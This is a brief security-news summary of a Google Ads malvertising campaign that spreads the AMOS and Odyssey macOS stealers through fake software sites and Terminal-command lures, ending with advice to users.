A malicious campaign is using Google Ads to promote counterfeit websites for popular macOS tools like Homebrew, LogMeIn, and TradingView. These fraudulent sites, which number over 85 domains, are designed to distribute information-stealing malware such as AMOS and Odyssey. The attackers employ "ClickFix" social engineering, tricking users into copying and executing malicious commands in the Terminal.
The commands, often disguised as security verification steps, download and run a script that fetches the malware payload. This script bypasses macOS security features like Gatekeeper by removing file quarantine flags. Once executed, the malware checks for virtualized environments, kills processes like OneDrive updaters, and runs with root privileges to avoid detection.
The primary goal is to harvest sensitive data, including browser credentials, cryptocurrency wallet information, and personal files, which are then exfiltrated. Both AMOS and Odyssey are sophisticated stealers, with AMOS also featuring a persistent backdoor. Users are strongly advised to avoid pasting unfamiliar commands into the Terminal and to download software only from official, verified sources.
Read more...